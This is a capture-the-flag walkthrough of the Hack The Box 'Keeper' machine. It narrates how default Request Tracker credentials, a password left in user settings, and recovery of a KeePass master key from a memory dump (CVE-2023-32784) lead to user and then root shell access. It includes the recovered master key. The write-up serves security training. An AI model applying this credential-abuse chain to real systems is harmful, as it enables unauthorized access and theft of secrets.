Summary:

In this walkthrough, we will explore the Keeper Hack The Box machine. This tutorial will guide us on discovering default credentials for a particular software or service, in this case, Best Practical Request Tracker 4.4.4 and then using CVE-2023-32784 to get the masterkey. We'll also learn how to exploit these credentials to gain shell access. Furthermore, we'll delve into the usage of PuTTY on Windows to establish a connection to the machine as the root user through certificate authentication.

Foothold:

Following my routine, I performed an nmap scan while listening music on spotify (I was listening that song) and observed the following open ports: 22, 80
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3
80/tcp open http nginx 1.18.0

During this scan, I discovered the presence of an HTTP server at the address http://10.10.11.227. On the main and only page (gobuster didn't find anything) there was a link to a subdomain named tickets.keeper.htb/rt. To simplify access, I added the entry 10.10.11.227 keeper.htb tickets.keeper.htb to my /etc/hosts file. Subsequently, I navigated to this subdomain and found it hosting the Best Practical Request Tracker version 4.4.4.
I didn't have any information about users so I seached for default credentials on google and found that version 4.4.4 use the combination [REDACTED], I tried it and it worked!

Exploitation:

I logged in as root and browse the pages, under Users page I found that there are present 2 users: root and lnorgaard, I opened his settings and there was his initial password which was [REDACTED].

I tried ssh lnorgaard@keeper.htb with the password found earlier and it worked, I had shell access to keeper and I was able to read the user's flag.

...

System Enumeration:

That part was pretty easy. I found a zip file inside user's directory named RT3000.zip. I set up a python3 http server and downloaded the file with wget.

            #on the target machine I ran
            python3 -m http.server 8888
            # while on my machine
            wget http://keeper.htb:8888/RT3000.zip
            unzip RT3000.zip
          

Inside that archive I found two files:

            -rwxr-x--- 1 lnorgaard lnorgaard 253395188 May 24 12:51 KeePassDumpFull.dmp
            -rwxr-x--- 1 lnorgaard lnorgaard      3630 May 24 12:51 passcodes.kdbx
          

After some research I found a possible tool to dump the password from /home/lnorgaard/KeePassDumpFull.dmp named keepass-dump-masterkey, that tool found a possible password.

There was missing the first character as the tool said and there were three starnge characters in the password. I started to search on google and after some time I remembered about google dorking, I tried to copy the characters that were present on all the lines and change the strange character with *. I searched for: *dgr*d med fl*de and found the password, keep in mind that there are three non-latin characters.

System Exploitation:

I switched on windows and downloaded the KeePass 2.54 portable opened the software then opened passcodes.kdbx and used the password found earlier rødgrød med fløde and it worked! Under root's notes there was a PuTTY rsa-key, which allowed me to connect to the machine as root through PuTTY with certificate authentication. To do so I right cliecked on the root note and selected "Copy note" then created a file name certificate.ppk and pasted the note I copied earlier, then I right cliecked on the file and selected "Open with PuTTY" then wrote root@10.10.11.227 and it worked, I had shell access on the machine.

Writeup learnings:

This machine [keeper.htb] was an easy one, despite this, I reviewed my knowledge about google dorking and windows PuTTY and learnined a new software request-tracker v4.4.4.